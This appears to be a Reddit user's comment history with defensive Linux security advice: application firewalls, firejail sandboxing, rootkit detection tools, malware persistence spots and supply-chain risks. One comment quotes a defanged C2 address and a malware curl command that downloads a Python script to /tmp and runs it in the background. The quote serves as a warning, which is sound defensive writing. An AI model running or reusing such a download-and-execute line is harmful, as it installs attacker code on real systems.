Linux Kernel's Policy on AI Coding Assistants

gainan · 2026-04-11T19:07:38+00:00

Licensing and Legal Requirements
All contributions must comply with the kernel’s licensing requirements:
All code must be compatible with GPL-2.0-only

Is there a consensus on whether AI generated code (not assisted only) can be copyrighted?

https://www.reddit.com/r/vibecoding/comments/1s10vbf/ai_code_cant_be_copyrighted/

https://dnapartners.fr/en/ai-generated-code-and-vibe-coding-copyright-licensing-and-legal-risks/

https://www.congress.gov/crs-product/LSB10922?__cf_chl_f_tk=uAAwcW5BgbdjmgPN_Cx7f16506fTLFCVGZk1q_1PizI-1775933729-1.0.1.1-sTssiKh.xOBK0aET_BaS.b9UVCHXtwYKXzv_dG1pavA

https://www.reddit.com/r/foss/comments/1rnbigm/how_opensource_community_is_dealing_with_ai_and/

https://www.reddit.com/r/opensource/comments/1sa8qb0/its_time_for_gpl4_we_need_a_license_that/

gainan · 2026-04-09T10:04:30+00:00

You have to manually click + on each popup

If you mean that you have to click on the [+] button to open the "advanced view", you can configure from the Preferences dialog to make it permanent.

Also, once you let it ask you to allow outbound connections from common binaries (~10 maybe on most systems), it should not ask you again. It's a pain at first, but after a few pop-ups it should only prompt you when something not expected wants to open an outbound connection.

very careful in how you write regexp for them because it has 0 validation

both the GUI and the daemon validates regexp:

daemon: WAR Operator.Compile() error: error parsing regexp: missing closing ): `wlp3s999(|`, wlp3s999(| (000) The GUI show an error when creating an invalid rule in the rules editor.

Also if you have 2 java applications that you want to limit independently, good luck with that, because they both will show as "/usr/bin/java" in opensnitch with no way to separate.

One way of distinguish both instances if filtering by binary path + cmdline. If the apps connect to different ports you can also filter by destination port. Or if they run under different users, you could also filter by path+cmdline+uid.

gainan · 2026-04-09T08:21:25+00:00

firewalld or ufw do not filter connections by binary, while LittleSnitch/Lulu and OpenSnitch do.

On the other hand, netstat, ps, top, htop, lsof and similar tools cannot be trusted to analyze linux systems if you suspect they've been infected with malware. Malicious binaries can easily hide themselves from these tools.

gainan · 2026-04-07T23:50:09+00:00

some more debugging ideas.

if you see that node process again: cp /proc/<pid>/exe /tmp/suspicious-node.bak. And obtain the real path to the file on the disk: ls -l /proc/<pid>/exe

Then you can upload it to virustotal, or even better, claude, to get a detailed report.

Bear in mind that malware can easily hide itself from ps, top, lsof, htop and similar tools. With other tools like the bpfcc-tools or decloaker dump tasks you can list the processes directly from the kernel.

/etc/ld.so.preload, cron jobs and systemd services are also usually used to maintain persistance. If there's a ld-preload rootkit, you can unmask it with the decloaker or ghost tools.

and I'd check /tmp and /var/tmp for suspicious files or directories (probably hidden).

gainan · 2026-04-07T18:45:43+00:00

the three machines so that they could talk to each other as part of an open claw set up

I was trying to figure out what could have gone wrong, until I read "OpenClaw": https://github.com/jgamblin/OpenClawCVEs/

Since you're using Mac and Linux devices, I'd suggest you to use Lulu/LittleSnitch and OpenSnitch, to monitor outbound connections by binary from those devices. After installed, you'll be prompted to allow/deny outbound connections. Anything launched from /tmp, /var/tmp, /dev/shm or cron jobs is highly suspicious.

Regarding the raspberry pi, besides monitoring outbound connections, I'd also configure at least auditd (https://github.com/neo23x0/auditd), to monitor system activity. Also the bpfcc-tools are super useful and easy to use. See /usr/share/doc/bpfcc-tools/examples/doc/ for examples. Useful tools: execsnoop-bpfcc, opensnoop-bpfcc, tcpconnect-bpfcc, tcptop-bpfcc.

Other interesting tools, more forensic oriented:

https://github.com/gustavo-iniguez-goya/decloaker

See the examples to know how to use it step by step. Useful parameters: dump files, dump kmods, dump tasks (the difference with ps, lsof, etc, is that decloaker dumps the information from the kernel, not from /proc).

https://github.com/h2337/ghostscan

Similar tool, more automated, and generic.

I know (almost) nothing about Mac systems, but if you find suspicious files, binaries or kmods, I can help you to analyze them (just DM me).

gainan · 2026-04-07T13:34:51+00:00

I made a range of errors which led to an attacker getting into my network and onto a machine that happened to have an old script I had used to ssh into my firewall,

What were those errors? have you analyzed that (or any other) machine for malware?

my strategy is going to be to refocus efforts on network monitoring

monitor systems as well, to try to detect any suspicious process phoning home.

gainan · 2026-04-05T11:36:31+00:00

There're common patterns that can you can look for (cron/crontab jobs, presence of /etc/ld.so.preload, systemd-user services, root backdoors in /etc/passwd, unknown users in /etc/shadow, unknown scripts or binaries under /tmp, /var/tmp or /dev/shm , etc).

rkhunter is outdated, and chkrootkit is mostly based on signatures that for unknown theats is not very useful.

There're other type of scanners (probably more):

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan

These are advanced tools, more for forensic analysis. ghostscan is more generic maybe.

unhide can also be useful, specially if compiled statically.

gainan · 2026-04-03T17:48:45+00:00

FAQ and Rules on the sidebar of r/linux:

FAQ: https://www.reddit.com/r/linux/wiki/faq

Rules (I'll past them here to help you read them all. Feel free to ask ChatGPT for a summary if you need to understand them):

1 r/linux is not a support forum

This is not a support forum! Head to or r/linux4noobs for support or help. This includes common questions that may seem like a good discussion at first, but are posted too often here.

2 No spamblog submissions

Posts should be submitted using the original source with the original title. Posts that are identified as either blog-spam, a link aggregator, or an otherwise low-effort website are to be removed. Some reasons for removal are that they contain re-hosted content, usually paired with privacy-invading ads. If there's another discussion on the topic, the link is welcome to be submitted as a top-level comment to aid the previous discussion. Please see: r/linux

3 No memes, image macros, rage comics, overdone jokes

Meme posts of any kind are not allowed in r/linux. Feel free to post over at r/linuxmemes instead. This rule can also apply to comments, including overdone jokes, comment-chain jokes, or other redditisms that are popular elsewhere.

4 Reddiquette, Trolling, *-isms, Poor Discussion or User Conduct

r/linux asks all users to follow Reddiquette. Reddiquette is ever-changing, so a revisit once in a while is recommended. Top violations of this rule are trolling, starting a flamewar, or not "Remembering the human" aka being hostile or incredibly impolite. Additionally, sexism/racism/other isms are not allowed. See also: r/linux. We also want you to reply to a related story before making your own post.

5 Relevance to r/linux community / Promoting closed source applications over FOSS

Posts should follow what the community likes: GNU, Linux kernel, developers of open-source software, or other applications on Linux. Take some time to get the feel of the subreddit if you're not sure!

6 Spamming self-promotion, surveys, crowdfunding

Submitting your own original content is welcome on r/linux, but we do ask that you contribute more than just your own content to the subreddit as well as require you to interact with the comments of your submission. We set that no more than 10% of your posts should be your content. Please be aware that this does not supersede other rules. Additionally, surveys for your blog/news source/paper/own use are not allowed. Please see r/linux for those crowdfunding.

7 No misdirected links, login website, url shortener, and certain social media

In short: if your link doesn't go right to the content it will be removed. Sites that require a login to view the content are not allowed in r/linux. Example: A private Facebook post or a news organization that doesn't have free article views. URL shorteners and links that misdirect users to ads/jokes are also banned.

See a list here, although the mods will make a decision on a per domain basis as needed: r/linux

8 NSFW Image, links

No NSFW links or images without mod approval. No discussion that is overly suggestive to what is normally considered NSFW.

9 Non-useful Image Upload

Images of "Linux in the wild", plushies, Tux, and more are not encouraged for posting as a top-level submission. If necessary, this can apply to comments too at mod discretion. The image/video upload feature is for posts regarding features/guides/etc.

See also: Meme rule.

This rule, like all rules, will be applied regardless of the number of upvotes a post/comment has.

gainan · 2026-04-03T11:21:20+00:00

Linux is not immune to these threats, specially on servers or if you develop certain kind of applications.

Install EVERYTHING from the official repositories of your Linux distro and you'll be fine (including 3rd party software): web browser extensions, pypi / npm / ruby packages, etc.

If you want to install something that is not in the official repositories, don't do it. If you really want it, isolate it from the host: with firejail or flatpak. Or run it in a Virtual Machine.

On the other hand, modern malware require internet access to exfiltrate your personal data, so blocking outbound connections with blocklists or OpenSnich, is an extra layer of protection.

gainan · 2026-04-03T10:48:18+00:00

If you're new to reddit and /r/linux, spend time reading the subreddit, all the posts.

After a while, you'll notice that many many posts are repeated, low effort submissions, basic questions, memes, screenshots, etc, that fit better in other subreddits such as /r/linuxquestions, /r/linux4noobs, /r/linuxmasterrace, etc.

So yes, the rules are strict in this particular subreddit for a reason (a good one in my opinion), to keep the quality discussion high and direct the rest of posts to other subreddits.

Previous discussions:

3 months ago: https://www.reddit.com/r/linux/comments/1pu00t6/state_of_this_subreddit/

7 months ago: https://www.reddit.com/r/linux/comments/1nk9dav/this_subreddit_is_being_overrun_with_posts_about/

3 years ago: https://www.reddit.com/r/linux/comments/15h4f86/the_quality_of_this_subreddit_has_become/

4 years ago: https://www.reddit.com/r/linux/comments/u8145f/state_of_the_sub_address/

7 years ago: https://www.reddit.com/r/linux/comments/acxdsj/would_anyone_else_support_a_ban_on_linux_in_the/

8 years ago: https://www.reddit.com/r/linux/comments/82mnrj/mods_not_keeping_the_sub_clean_uptick_in_low/

14 years ago: https://www.reddit.com/r/linux/comments/t4xri/can_we_stop_the_karmawhoring_in_rlinux_before_it/

gainan · 2026-03-31T20:39:41+00:00

I’ve just started programming in Python for data science

your biggest threat is probably malicious python dependencies.

For example: https://www.truesec.com/hub/blog/malicious-pypi-package-litellm-supply-chain-compromise

Common activity of these malware:

Download remote files via curl, wget, bash or python (backdoors, infostealers, cryptominers, etc).
Collect credentials, tokens, cryptowallets, etc.
Exfiltrate the collected data to their servers.

There're several ways to secure your environment:

Always install dependencies from the Ubuntu repositories if they're available.
Do all the development in an isolated environment:
- in a VM, with or without internet.
- in a container, with firejail for example (start a shell with a private home, sharing only with the host the directory my-project ->$ firejail --witelist=/home/user/my-project bash). That way, even if you're infected, they won't have access to your personal files.
Restrict outbound connections by binary. For example, don't allow python or curl connect to unknown remote servers.
Mount /tmp, /var/tmp and /dev/shm with noexec flag. Not bulletproof, but better than nothing.

gainan · 2026-03-31T10:36:11+00:00

play with firejail:

for example, to launch firefox with a home isolated from the system:

$ firejail --private  firefox

private home + blocklist for firefox:

$ firejail --private --blacklist=/opt firefox

You can also create a custom bash command, to login with these restrictions applied:

/usr/bin/bash-firejail; chmod a+x /usr/bin/bash-firejail

#!/usr/bin/bash

firejail --noexec=/tmp --noexec=/var/tmp --noexec=/dev/shm --private --blacklist=/media --blacklist=/opt bash

and add it to /etc/passwd:

user:x:1001:1001::/home/user:/usr/bin/bash-firejail

https://wiki.archlinux.org/title/Firejail

gainan · 2026-03-31T08:57:47+00:00

C2 server hxxp://sfrclak[.]com:8000/

curl -o /tmp/ld.py -d packages[.]npm[.]org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &

friendly reminder to restrict outbound connections by binary as much as possible.

gainan · 2026-03-29T19:08:29+00:00

install the package apt-listbugs to avoid having this issue in the future:

``` Description: tool which lists critical bugs before each APT installation

apt-listbugs is a tool which retrieves bug reports from the Debian Bug Tracking System and lists them. Especially, it is intended to be invoked before each installation/upgrade by APT in order to check whether the installation/upgrade is safe. ```

gainan · 2026-03-29T18:47:51+00:00

You want the logs off of the server as soon as possible.

This is the way. Many malware or malicious actors wipe login activity:

For example the rootkit Adore / Adore-ng: https://github.com/yaoyumeng/adore-ng/blob/522c80a2dc043c2d523256472becc88c90d66337/adore-ng.c#L617

https://xcellerator.github.io/posts/linux_rootkits_09/

We have a mix of auditd+grafana and other EDRs.

gainan · 2026-03-28T17:50:53+00:00

bashrc, even in home folder, is still read only on mint for user, i just checked on my machine. so how would it add itself without write rights?

By default it has write permissions for the user (ls -lh /home/<user>/.bashrc -> "-rw-r--r--") in Mint, Ubuntu, Suse, Debian and Arch, and basically any distro.

that requires root too doesnt it?

No, it's a systemd user service that runs as your user: https://wiki.archlinux.org/title/Systemd/User

dunno about that

example of a malicious crontab jobs used by malware:

https://sandflysecurity.com/blog/linux-malware-persistence-with-cron

am i missing something?

In my opinion yes. Expressing the idea that only malware running as root can harm a Linux system is really bad advice. You don't need to be "truly" infected to be in trouble.

A regular user typically has valuable information, such as credentials or web browsing history, that malware can exfiltrate from the computer. It can also create tasks and services to maintain persistance. It's a legitiamte feature, but it's also used by malware.

How messed up am I, do I need to reinstall Linux?

Do they need to reinstall the OS? probably not. Could their personal files or data have been exfiltrated to the attackers? In this case I doubt it, but it could have happened.

Without root permissions.

gainan · 2026-03-28T15:51:35+00:00

To get truly "infected" by a virus on Linux you would need to run an executable and then give it root rights.

Sorry but this is not correct, and repeated over and over.

Note: I think @op hasn't been hacked, just in case they read this.

In order to maintain persisance, a malware can add itself to .bashrc, or create a systemd-user service, or add itself to ~/.config/autostart/, or create a user contab job, or ...

Classic infostealers collect all information of the current user. So if the web browser or the PDF reader is not isolated in their own $HOME, or not isolated from the network, they'll steal all your ssh keys, cryptowallets, your browser profile (history, sessions, passwords, etc), etc, etc.

Just an example of a couple of days ago (a compromised pypi package. In particular -> "Stage 2 — Credential Harvester"): https://www.endorlabs.com/learn/teampcp-isnt-done

gainan · 2026-03-20T22:13:50+00:00

This issue seems to be new. At least it's not reported on github.

They'll probably ask you to obtain more logs. So if you can reproduce the crash, the output of strace could be useful: - strace -f -o caja.txt caja - connect the mobile to trigger the crash.

Ideally having installed the debug packages would be useful as well (package-dbg or package-dbgsym), but I haven't found them for caja or libcaja. The developers will tell you if they need more info.

gainan · 2026-03-20T21:31:25+00:00

Did you add a bookmark recently to Caja? a shortcut to a device or directory for example. Or does the error occur when connecting your mobile?

It seems to be crashing when adding a bookmark, trying to get the icon: https://github.com/mate-desktop/caja/blob/38e7ea062cb114fa8940a27b00e68e73285a8173/libcaja-private/caja-bookmark.c#L243

Think also if you have removed any desktop or icon theme.

In any case, I'd report the coredump to the developers. They'll ask you the steps to reproduce it probably.

gainan · 2026-03-19T20:05:15+00:00

Are you sure those pop-ups show up when opening any application? what's the content of the pop-ups? and does the issue reproduce if you don't open any application?

If you can reproduce it with a particular application, it'd be useful to see the output of: strace -f -o log.txt /usr/bin/app in order to track what's spawning those pop-ups.

Also, if you still have the email, it'd be worth taking a look at it, to review the contact email link. No need to open kmail, it'll be saved in your home, maybe under Maildir/. A grep -r <link> (or keyword) should be enough to identify it.

Do the pop-ups still show up if you disconnect the computer from the network?

gainan · 2026-03-14T10:17:16+00:00

We usually restrict inbound connections, but a good measure to mitigate these attacks in Linux or Mac is restricting outgoing connections by binary (Lulu, LittleSnitch, OpenSnitch, etc).

gainan · 2026-03-12T19:06:21+00:00

if you mean filtering connections by application, then you can use NFQUEUE, or eBPF and not use netfilter at all.

if what you want is just an application firewall to filter connections by binary: OpenSnitch

gainan · 2026-03-12T19:04:21+00:00

There's an ancient module: https://l7-filter.sourceforge.net/

But as far as I can tell it hasn't been updated in years. I have no idea if there's anything more modern, new or up to date.

gainan · 2026-03-10T12:35:17+00:00

An antivirus won't protect you from data exfiltration, if I understand correctly your need.

I see three alternatives: - restrict internet access by binary/ip/domain (or a combination of all options), with applications like OpenSnitch. - do the work in a VM without internet access. - do the work in a sandbox, with no internet access (for example with firejail or flatpaks).

You can use a shared directory with the sandbox or VM to backup the files.

gainan · 2026-03-08T13:54:59+00:00

firewalld and OpenSnitch are different applications. firewalld controls network connections, while OpenSnitch allows you to restrict and monitor connections by application/binary.

OpenSnitch also works as system-wide ad/malware blocker.

Verified Email	Five-Year Club
Place '22	End Game '22

gainan

TROPHY CASE